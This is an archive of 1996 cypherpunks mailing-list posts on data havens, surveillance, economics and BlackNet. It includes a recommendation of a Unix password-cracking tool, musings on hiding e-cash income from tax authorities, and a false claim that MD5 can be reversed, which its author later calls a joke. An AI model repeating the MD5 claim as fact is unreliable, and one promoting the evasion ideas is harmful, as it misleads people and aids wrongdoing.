From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sun, 18 Aug 1996 03:49:21 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8C73.39F4E8E0@groningen12.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


	Timothy May wrote:

      >Others have shown how meaningless your repeated calls for a proof are, as
      >so many assumptions must be carefully spelled out.

>To give an example of how hard the situation is to analyze, consider the
>computer and chip industries. (If you argue that your "theorem" is for
>nations in the aggregate, and not any particular companies or even
>industries, then I will maintain that my example holds pretty much true for
>automobiles, pharmaceuticals, chemicals, and so on._

>The computer and chip industries move certain investments abroad, to
>Malaysia, the Phillipines, Indonesia, Mexico, and so forth. But by moving
>these investments abroad, they believe their net market size,
>profitability, shareholder value, etc., will be enhanced. Else they
>wouldn't do it.

>Multiply this by all the industries....

>Now, would "the economy" be "better off" if Intel, say, had not moved
>assembly operations to Malaysia in the 1970s? Perhaps Intel would now be
>bankrupt and gone, as so many of its rivals of the time are now gone and
>barely remembered.
>You see the problem? Who can say what "better off" is, given that we can't
>run history down alternate paths as an experiment.

>Your one-track mind is truly astounding. We've had kooks and oddballs on
>the list before, but never one who has written a dozen or more posts asking
>the same ill-phrased question over and over again.

So you say that my question can't be answered because the situation is too difficult to analyze, "given that we can't run history down alternate paths as an experiment." The situation is indeed hopelessly difficult if you think that economics is an empirical (experimental) science. But, as an Austrian, you should know that economics isn't an empirical science; it's a science that deals with the logic of human action. It starts from the axiom of human action, and all the other axioms of economics follow from this axiom by deductive reasoning. This is called the praxeological method. The answer to economic problems can only be given by reasoning, not by running experiments in the real world. Read Mises (Human action), Rothbard (Man, economy and state) etc. for further information. To prevent you from claiming this isn't true, I will quote Rothbard (in 'The foundations of modern Austrian economics', p. 19, ed. E. Dolan): "Praxeology rests on the fundamental axiom that individual human beings act(...) The praxeological method spins out by verbal deduction the logical implications of that primordial fact." etc.
So, it really doesn't matter at all that we can't run history down alternate paths as an experiment, because the kind of empirical 'data' that such experiments would generate are not very helpful in the first place. Fortunately, situations that are at first sight hopelessly difficult can sometimes be analyzed and simplified by performing a thought experiment. That's what I did when I offered my 'reductio ad absurdum' proof. I didn't use empirical data, I used logic and reasoning; that's the way it should be done in economics. So far, you didn't rebut the proof I offered. You only argue that my proof must be wrong because the situation is too difficult to analyze because of all the empirical data that are lacking. That argument is, as I explained above, not to the point. And the fact that you take refuge in name-calling makes me suspect that subconsciously you don't find it very to the point yourself either.
I understand it's not pleasant to be rebutted every time you answer my posts, but I fear it's something you will have to get used to. Of course, you could also consider making better arguments (after reading the books I suggested), or else stop posting on the subject.

Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 18 Aug 1996 12:32:58 +0800
To: Brian Lane <blane@aa.net>
Subject: Re: Orbiting Datahavens
In-Reply-To: <Pine.LNX.3.95.960702170220.402A-100000@opus.islet.com>
Message-ID: <Pine.3.89.9608171955.A28947-0100000@netcom20>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 2 Jul 1996, Brian Lane wrote:

> On Sat, 17 Aug 1996, Derek Bell wrote:
> 
> 
> > >  If the HAM radio community can get a satellite into space, why not the
> > >Cypherpunks/Linux communities?
> > 
> > 	Wow - I've been out of touch with space programmes in the last few
> > years - which satellite was this? (The HAM radio one?)
> 
>   Embarrasingly enough, I cannot remember its name. I don't have a HAM
> license (although I've studied for it -- just never took the test), but my
> boss does. I think the satellite was launched in the mid to late 80's, and
> it used for experimental communications.
> 
The satellite is called OSCAR (Orbital-something-something-Amateur-Radio).
The first one was launched in 1961, and 20 more have been launched since 
then, as the older ones wear out or there are advances in technology.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 18 Aug 1996 09:46:41 +0800
To: Eric Messick <eric@syzygy.com>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <199608172309.QAA10539@syzygy.com>
Message-ID: <Pine.SV4.3.91.960817194950.21584O-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Eric Messick wrote:

> Representatives of the laboratory acknowledge that the sense of
> modesty of some airline passengers, jurors, federal office workers and
> others subjected to radar scanning might be offended.



   The output is false-color scaled.


Look at IR sat-photos of the earth to get a sense of this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Jonkman <bjonkman@sobac.com>
Date: Sun, 18 Aug 1996 19:54:02 +0800
To: cypherpunks@toad.com
Subject: Re: Drive the SF Central Freeway, have your license plate
Message-ID: <9608180913.AB01288@xenon.xe.com>
MIME-Version: 1.0
Content-Type: text/plain


> >At 21:55 8/8/96, i am not a number! wrote:

> >>CBS radio news this morning: 80,000 commuters traveling the
> >>central f'way in SF will have information mailed to them
> >>regarding the quake retrofit How?  Their license plates have
> >>been photographed.

> At 10:45 PM 8/8/96 -0700, Lucky wrote:

> >You *are* making this up, right? Please say you did.


Maybe '!number' was making it up, but license plate photography 
exists today in the Great White North.  A new freeway is being 
built through Brampton, the 407ETR, for Express Toll Route.  
At each on and off ramp there are electronic pickups and video 
cameras.  You can subscribe to the toll by buying a transducer 
that sits behind your rear-view mirror, signals from which will 
be picked up by the the toll gates as you enter and leave the 
freeway.  If you elect not to subscribe your license plate will 
be photographed and you'll get a bill in the mail.  If you elect 
not to pay the bill you'll be nabbed for it the next time you go 
to get your drivers license or car registration renewed...

Big Brother is not only watching, he's recording your location
and destination, measuring your distance travelled, and charging 
you for the privilege of driving...



=====
Bob Jonkman                         SOBAC Microcomputer Services
4 Gold Pine Court                      mailto:bjonkman@sobac.com
Brampton  ON  L6S 2K6  Canada                Voice: 905-793-4537
Networking   --   Office & Business Automation   --   Consulting
Key fingerprint: 9F AF A6 AC B5 67 BC 10 89 73 7C F0 CB 27 03 17
finger -l bjonkman@sobac.com or send mail with subject 'send key'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <maverick@interconnect.net>
Date: Sun, 18 Aug 1996 11:09:35 +0800
To: cypherpunks@toad.com
Subject: Re: Protecting floating datahavens?
Message-ID: <19960818011847984.AAD128@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: stewarts@ix.netcom.com, cypherpunks@toad.com
Date: Sat Aug 17 20:15:22 1996
> The basic risks with such things are:
> 1) Getting governments to agree to leave you alone.  If you're doing a
> 2) Getting governments and other pirates to actually leave you alone.
> 3) Making it work financially, for the proprietors and tenants/co-owners.
> 4) Convincing investors that you're safe enough on 1) and 2)

Auctually, the one real big problem is that the data is all in one place.  
Rememeber that the whole point of a data haven isn't secure backup -- it's 
secure storage.  And if the place gets blown sky-high (which can easily be 
done discreetly and possibly made to look like an accident), all the data 
is going to be lost, and you're basically screwed.  

The only workable solution to this that I can see has nothing to do with 
floating countries or anything of the sort.  Instead, the use of 
data-splitting programs could be used.  I'm not all up on the security or 
reliability of these programs, so if I'm making unwarranted assumptions, 
guess I did a lot of typing for nothing.  This has probably been proposed 
before, too, but what the hey...

For example, lets say you set up an office in 100 countries (it would be 
more effective to have more, but let's say 100).  Through the use of 
anonymous remailers and encryption, he could apply for a customer ID number 
and password.  To avoid any possibility of forgery, such IDs could be 
prehaps 100kb-1Mb (this is just for confirmation of identy when sending the 
data into the data havens -- shorter IDs would be used for identifcation). 
Then, he could split the program into 100 parts, with (say) 70 parts being 
needed to restore the entire file.  He would then encrypt and send each of 
these files to each remailer through the Internet.  

To get the data back, he would send in the ID and password, encrypted 
again, to the nessecary number of offices in order to retrieve the data.

Payment, if nessecary, could be made by anonymous bank transfer or 
something like ecash.  

Proprietary encryption systems (PGP-like, with IDEA/RSA hybrid in it, but 
can accept 5000+ bit keys and padding) might be used, as well.  

This scheme has several pluses.  One, it doesn't rely on any fancy legal 
manuevering with off-shore nationalities and crap.  Second, it isn't very 
vunerable.  They would need to get legal jurisdiction in 70 different 
countries to sieze the data, and then they have the encryption to deal 
with.  Third, if there's any server problems, it wouldn't affect the entire 
system.  Fourth, you don't have to attach missle launchers and hire a 
private security force to defend it.  There are several problems, though.  
First, it relies on the Internet, something which is inherantly insecure 
anyway.  Second, if someone's being wiretapped in their own country, then 
the whole effort is in vain.  Third, it would be incredibly costly, but 
probably no more so than any kind of off-shore platforms.  In fact, it 
would probably be cheaper.  

Any comments?
- ---
Sean Sutherland | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K w o O-(++)
Key: E43E6489   | M-- V PS+ PE++ Y PGP++ t--- 5+++ X++ R b++ DI+ D+ G e- 
Vote Browne '96 | h! !r y

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key: finger or email w/ 'send key' in subj.  http://www2.interconnect.net/maverick

iQEVAwUBMhZuq1ZoKRrkPmSJAQE9QQf7B+ikk1/dFKyydIzQkGcfX8+srK5GeRlr
5IhEFkXJY34dI4Dqg/yKQ6m/XwRMyqPHxcyV6lR6qU9ngaawBWjd1Q+HBtCOzEs6
Ch8AgTq5CWox8/7FZKz32xGJCVpPJ+etzeJSK2kqKfPnTW+yhz7rch+DIvEJKnM1
ktlxsi/3c1Hn89OLZrCHUeJQqBMoU7rVnmVv6sfGVUQuwJ09yWT457HCN7dZbH1z
Nrc+w7ewlxivH1r6KZ1DNk8BJrroQXD7mSHvXmEwyTiyr9DzaPhtlllarz/iPNFF
295F/4Cj9K2HiwJfKH7pDy60OKLBGP72xnc0cjxj8TlIp/KDY7VsPQ==
=BNfl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 18 Aug 1996 11:07:36 +0800
To: cypherpunks@toad.com
Subject: Re:NT remailer
Message-ID: <199608180134.UAA13028@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Aug 17 20:37:49 1996
> At 21:08 8/16/96, rednax wrote:
> >Speaking of NT, I downloaded the full version of msie 3.0 the other day
>  but
> >when I tried installing it, an error message came up saying that it
>  requires
> >a Win95 or WinNT4.0 build of 1381 or higher. I am currently running NT
>  4.0b
> >that has a build of 1314, does anyone know of where is the upgrade or
> >service packs(if available)? I have tried looking around microsoft.com,
>  but
> >they neither provided any detail nor did they provide an e-mail.

1381 is the full release version of NT 4.0 - there probably
isn't an upgrade or service pack. You'll have to lay down
your cash just like the rest of us poor slobs.

dave


- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
"Welcome to the human race." -- Snake, _Escape from L.A._
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMhZz8DVTwUKWHSsJAQEelQf+I7iHCNOwFnYn94uvxuczY0PTYP5nU9dp
nQXVbdlVNO+vZH4y+9CLEhoaNbD+BLxSaULk6nAIUmvwyL9dniKJ9wmcUsAoJrk0
ML/najbDHQJ8BsSbV9ivyLJZxwwnCGmLHwcvchJtppLdXzkKFO0EwvY0LGtim4CZ
uWjhKlI6rUo9trHeLtPCn/RuQheaT4x4I7TEA4OZkP46DnWRl/4288MPAcL4SxUO
ojt/Bw8eAxhNOeBhuj7s2UaFmfCejH6ml1jLI/b7+a9tUvDnq8hPMlRAyVDzkj4I
n9kHLvO0spjweXWNgj2NqDHfu2Ygtz+vMlpXJN4FUX++aYOlMOvytQ==
=kUCL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 18 Aug 1996 15:24:32 +0800
To: "cypherpunks" <null@void.com>
Subject: Re: forget photographing license plates!
Message-ID: <19960818051206140.AAC174@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Aug 96 01:31:08 -0800, null@void.com wrote:

>"In the 22 Jul 1996 issue of Fortune was an interesting look into the future
>of automobile electronics, "Soon Your Dashboard Will Do Everything (Except
>Steer)".  "
>From the control center, they can "electronically reach into the car" to
>unlock the doors, or honk the horn and flash its lights."
 ^^^^^^^^^^^^^^^^
How long do you think it would be before thieves subverted this feature?

>>>> It is extremely comforting to me -- I don't know about you -- to think >that GM will maintain a control center able to communicate with my auto >electronics.  Shit, why not TRW?

I'm just waiting for them to integrate with TRW. Then, with people
they've determined can afford a new one, they can trigger the car to have
mysterious engine failures...


| Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
| http://www.io-online.com/adamsc/adamsc.htp
| Autoresponder: send email w/subject of "send resume" or "send PGPKEY"

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 18 Aug 1996 14:03:15 +0800
To: Arun Mehta <cypherpunks@toad.com>
Subject: Re: Software manpower exports and the power of governments
Message-ID: <199608180349.UAA13056@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 13:23 16/08/96 -0700, James A. Donald wrote:
> > It is overwhelmingly clear that the question is simply who has the 
> > power?  Those who wish to hire peoples services in order to produce
> > wealth, or those who can command peoples services because they have
> > guns?

At 06:17 PM 8/17/96 +0600, Arun Mehta wrote:
> Are you suggesting that Indian programmers come to work with like
> a chain gang, with armed government guard? 

No.  I am suggesting that the more that power over business 
activities and decisions lies with those who do not need to 
make a profit or serve the customers needs, the less of value 
will be produced.


> Look, governments in the 3rd world are often stupid and corrupt
> -- no doubt that contributes to poverty, but that isn't the only
> reason. I'm sure one of the reasons is cultural: 

Was the culture of the refugees who fled to Hong Kong any different
from those who failed to escape from Communist China?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 18 Aug 1996 13:50:45 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Orbiting Datahavens
Message-ID: <199608180358.UAA29680@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:32 PM 8/17/96 -0500, snow wrote:

>
>     It is just as easy to take out a satelite in LOE as it is to sink an
>oil rig, plus swapping defective Hard Drives is a real bitch.

Hard drives don't work in a vacuum, at least conventional ones don't.  (And 
I'm not aware of any hard drives which are designed to be permanently 
pressurized against a hard vacuum, either...)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sun, 18 Aug 1996 11:59:40 +0800
To: cypherpunks@toad.com
Subject: Hackers invade DOJ web site
Message-ID: <32167A0C.473C@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
to the DOJ web site.  They don't elaborate exactly how thy did it.
 
______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sun, 18 Aug 1996 11:07:37 +0800
To: sparks@bah.com
Subject: [NOISE] Re: Greetings from Whore.com
Message-ID: <199608180122.VAA00582@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Nope.  No web access.  However, when school is back in session, and I get
my radio show back and head back to the computer labs...

<cackles evilly>

Greetings from <property not found>,
Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 18 Aug 1996 14:23:50 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [NOISE] Re: Stopped Clock. Was: Schlafly on Crypto
Message-ID: <199608180424.VAA27288@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 PM 8/16/96 EDT, you wrote:
>Bill Stewart <stewarts@ix.netcom.com> writes:
>> (If Clinton had said things like "Of course I tried to avoid the draft
>> and smoked dope, I'm no fool" and had dropped the draft and the Drug War
>> instead of supporting both after he was President, I might have
>
>There been no draft for about 20 years.  What have _you been smoking?

There's still draft registration.  Sure, they don't currently ask that
your body show up at Camp LeJeune for basic training, but they still
insist that you register where you live and essentially give them
permission to draft you if they feel like taking the political heat 
for doing so.  It's illegal not to register if you're 18 and male.
And they do occasionally track whether people are registered;
college loan databases are used for it, and there are occasional
mentions in the press that they've used other sources of
lists-of-18-year-olds to "remind" people that they have to register,
such as public school records.

Some day that you're not too disgruntled, walk into a Post Office
and look at the posters oon the wall.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 18 Aug 1996 15:20:36 +0800
To: cypherpunks@toad.com
Subject: Post Office restrictions
Message-ID: <TCPSMTP.16.8.17.-10.18.34.2312274844.1082397132@tom.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


I've told some people about a few of the loopholes mentioned on the list
about the new post office restrictions on airmail packages.  What's
disturbing is that none of the people I'd talked to, all of whom are
at least reasonably intelligent, had thought or heard, for instance,
that PanAm103 only took 12 ounces or that someone could just send two
packages.  How does the news media justify its existence? (Down here, it
seems to be serving as a propaganda arm for the Republicans)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Aug 1996 15:43:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: BlackNet as a Distributed, Untraceable, Robust Data Haven
In-Reply-To: <ae3939990d0210040b0a@[205.199.118.202]>
Message-ID: <199608180540.WAA16219@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I have to speak up here and say that there is an actual working exemplar of
>a distributed, untraceable data haven. While it lacks a robust _payment_
>mechanism, that is also untraceable, so does the "Visit Port Watson"
>example (which has never actually existed).

agree with Jim Bell that blacknet by any stretch of the imagination
is not a "data haven". it is a service for selling/buying secrets.
I'm quite surprised to see you misuse a term that I thought you
had largely invented/promolgated ("data haven"). as far as I understand
it, a "data haven" would function something like a remote disk drive.
blacknet did not claim to have anything to do with storing data
reliably like a drive does.

the idea of highlighting the fact that Blacknet was possible however
was something you certainly deserve all the notorious credit for <g>

others deserve the notorious credit for describing how a blacknet-like
scheme could be foiled or at least made difficult through the 
use of widespread decoys. <g> (and yet others deserve credit
for breaking the key to that <g>)

do you consider "decoys" "man in the middle attacks" as you wrote
in your essay, or are you conveniently ignoring this devastating issue
that was brought to your attention long ago?

one of your repeated claims is that a reputation service would help
identify the decoys, but I would like to see this happen in practice
before I believe it. remember that reputation services themselves
could be subject to infiltration and falsification. it becomes
a "who will give reputations on the people who give reputations"
infinite regress problem imho.

also, I always liked the way that you tied in Blacknet to 
anonymous assassinations. or maybe that was just part of my 
imagination. anyway I'm surprised that you haven't collaborated
with Jim Bell more who shares some of your ideas on the subject.

I certainly give you huge credit for discovering/elucidating
some of the more twisted uses of cyberspace long before they are actual
operating enterprises. <g>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 18 Aug 1996 12:51:00 +0800
To: cypherpunks@toad.com
Subject: Possible opportunity for school recruitment
Message-ID: <01I8EDF65HPS9JD95Q@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One wonders if they could be persuaded, in return for a donation of
money or time, to include some cypherpunks-related web pages; these could
include ones on PGP and on anonymous remailers, so they could later get email &
ftp access and use these.
	-Allen

>   Centura
>               CYBERED BIG RIG TRUCKS INTERNET ACCESS TO SCHOOLS
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Los Angeles Daily News
   
>   LOS ANGELES (Aug 17, 1996 00:00 a.m. EDT) -- Like some futuristic,
>   hi-tech bookmobile, "Ed" came calling on Charles Maclay Middle School
>   in suburban Los Angeles.
   
[...]

>   The privately funded CyberEd program is designed to provide hands-on
>   Internet experience and advanced, on-line communications training.
>   "Ed" -- a veritable cyber classroom on wheels, offers personal
>   computers, Internet connectivity and CD-ROMS, as well as presentation
>   facilities, printing, faxing and video conferencing capabilities.
   
[...]

>   Inside the yellow-and-black big rig in the Pacoima section of Los
>   Angeles, children and teachers alike tried their hand at surfing the
>   Net, pointing and clicking and generally immersing themselves in
>   everything from home pages of fellow students to cyberchats with
>   astronauts at the National Aeronautics and Space Administration
>   headquarters in Houston.
   
[...]

>   Plank said a $3 million fund-raising campaign was under way to
>   bankroll a fleet of rigs modeled after "Ed," each with a different
>   technological focus -- manufacturing, media, biotechnical and other
>   disciplines.
   
>   CyberEd is funded by the MCI Foundation, the William G. McGowan
>   Charitable Fund, DSC Communications Corp., Milken Family Foundation,
>   Corning Incorporated and Microsoft.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 18 Aug 1996 13:39:59 +0800
To: cypherpunks@toad.com
Subject: MD5 completely broken!
Message-ID: <199608180349.WAA01402@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Cypherpunks -- 

Atfer much scientific research, I have finally found a way to restore 
any message given only its MD5 checksum. The method is based on the
so called "enthropy restoration" algorithm. I have also written a
libMD5hack library for restoring messages given their MD5 checksums.

I plan to license the library for commercial use.

The price of the library is to be determined.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arnauld Dravet <scraver@mnet.fr>
Date: Sun, 18 Aug 1996 12:47:50 +0800
To: cypherpunks@toad.com
Subject: Re: Unix passwd-cracker online?
In-Reply-To: <9608171527.AA26704@raptor.icubed.net>
Message-ID: <321693CF.3B156C9C@mnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


there's a new cracker under dos called John the Cracker, and coded by
UCF96. It's optimized for Pentiumsand is better than cracker jack on a
lot of points : can work with or without wordlists, and u can modify all
what u want....approx 30% faster than cracker jack on a pentium (i run
it at usually 4000 cps on a P90/32Mb ram and a 25Mb wordlist (yeah it's
big))

scraver@mnet.fr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Aug 1996 16:25:23 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: MD5 completely broken!
In-Reply-To: <199608180349.WAA01402@manifold.algebra.com>
Message-ID: <199608180556.WAA17567@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Atfer much scientific research, I have finally found a way to restore 
>any message given only its MD5 checksum.

uhm, congratulations <g>

>I plan to license the library for commercial use.

uhm, a slight kink you don't seem to have considered
and might want to ruminate on--

if MD5 is broken, no one will anymore have any use for
anything associated with it <g>

maybe next time when you break a code and want to make
some $$$, sell your solution in secret 
to the people who patented it!!

cryptoblackmail!!!

wheeeeeee!!! crypto is so much fun!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 18 Aug 1996 15:13:44 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Orbiting Datahavens
In-Reply-To: <199608180358.UAA29680@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960817225517.3114A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, jim bell wrote:
> At 06:32 PM 8/17/96 -0500, snow wrote:
> >     It is just as easy to take out a satelite in LOE as it is to sink an
> >oil rig, plus swapping defective Hard Drives is a real bitch.
> Hard drives don't work in a vacuum, at least conventional ones don't.  (And 
> I'm not aware of any hard drives which are designed to be permanently 
> pressurized against a hard vacuum, either...)

     I'll rephrase that then. It is a real bitch to swap out defective hardware
on a satellite. 

     I don't know much about sats, and I realize that most of them are built 
to specs that are insane compared to anything that runs dirtside, but (and I 
am sure that someone will correct me if I am wrong) most sats aren't expected 
to deal with the wide range of tasks that your average network server deals 
with, nor do they have anywhere NEAR the memory capacities that we are talking 
about. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Aug 1996 17:24:01 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: MD5 completely broken! -- JOKE
In-Reply-To: <199608180610.BAA02817@manifold.algebra.com>
Message-ID: <199608180621.XAA19338@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



april 1 is not very near on my calendar, wiseguy.



Subject: Re: MD5 completely broken!
To: vznuri@netcom.com (Vladimir Z. Nuri)
Date: Sun, 18 Aug 1996 01:10:33 -0500 (CDT)
From: ichudov@algebra.com (Igor Chudov @ home)

Vladimir Z. Nuri wrote:
> this is front page of new york times fodder for sure
> if what you claim is true. in fact it is a *major*
> *major* breakthrough if real. I would expect many
> months of press fallout based on it. in fact if 
> for real, you are guaranteed instant worldwide fame.

I agree, but my message was a joke.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sun, 18 Aug 1996 18:25:39 +0800
To: cypherpunks@toad.com
Subject: Re: Ad Hoc Bay Area Cypherpunks Thing--Sat., 24 Aug, 3 pm, Menlo Park
Message-ID: <v02140b00ae3c81fc4de4@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 17 Aug 1996, Timothy C. May wrote:
>
> > There is no Cypherpunks event scheduled for that Saturday, but we can have
> > an ad hoc gathering, informally arranged. I suggest meeting at 3 p.m. at
> > Cody's Bookstore, on El Camino Real in Menlo Park (hard to miss). Or at the
> > coffee shop next to it...either should be sufficient Schelling points to
>
> Do you mean Kepler's? That's the one right near Menlo Park caltrain
> station; the coffee shop next to it is  Cafe Borone. Get the Mocha.

[Typing from the courtyard outside Cafe Barone (love that Ricochet...)]

For those needing better directions, Cafe Barone/Keplers is at the Menlo Park
Center, at the corner of El Camino and Ravenswood in Menlo Park...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 18 Aug 1996 19:09:51 +0800
To: "cypherpunks" <molnard1@nevada.edu>
Subject: Re: Burden of proof
Message-ID: <19960818074654046.AAA160@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Aug 96 20:55:12 -0800, molnard1@nevada.edu wrote:

>> This relates to something I have been wondering about:  If one could
>> get one's company to pay one in electronic cash, what is to stop one
>> from piling the coins in a Datahaven somewhere (assuming one existed
>> that would be usable for these purposes) and say to the IRS: Money?
>> What money?  Can you find any of my money?  I, uhh... lost it!  Yeah,
>> that's it!!
>	What is to stop the IRS from pointing out that you received the 
>money from your employer? Maybe you could convince them you were unable 
>to pay, but that would require squirreling away(and refraining from 
>using) all your assets. 

On the other hand, if your employer was willing to do some sneaky ecash
stuff, then it might get interesting.  Alternately, how about having an
off-shore bank that supposedly has very high interest rates and fees. 
"Sorry, this is all I have left"

| Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
| http://www.io-online.com/adamsc/adamsc.htp
| Autoresponder: send email w/subject of "send resume" or "send PGPKEY"

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 18 Aug 1996 19:30:49 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 completely broken!
Message-ID: <2.2.32.19960818082658.006e7eec@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 8/17/96 -0500, Igor Chudov wrote:

>Cypherpunks -- 
>
>Atfer much scientific research, I have finally found a way to restore 
>any message given only its MD5 checksum. The method is based on the
>so called "enthropy restoration" algorithm. I have also written a
>libMD5hack library for restoring messages given their MD5 checksums.
>
>I plan to license the library for commercial use.
>
>The price of the library is to be determined.

Research, my ass. You should stop drinking. 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Aug 1996 20:05:17 +0800
To: cypherpunks@toad.com
Subject: Re: Ad Hoc Bay Area Cypherpunks Thing--Sat., 24 Aug, 3 pm, Menlo Park
Message-ID: <ae3c327900021004da3d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:17 PM 8/17/96, Simon Spero wrote:
>On Sat, 17 Aug 1996, Timothy C. May wrote:
>
>> There is no Cypherpunks event scheduled for that Saturday, but we can have
>> an ad hoc gathering, informally arranged. I suggest meeting at 3 p.m. at
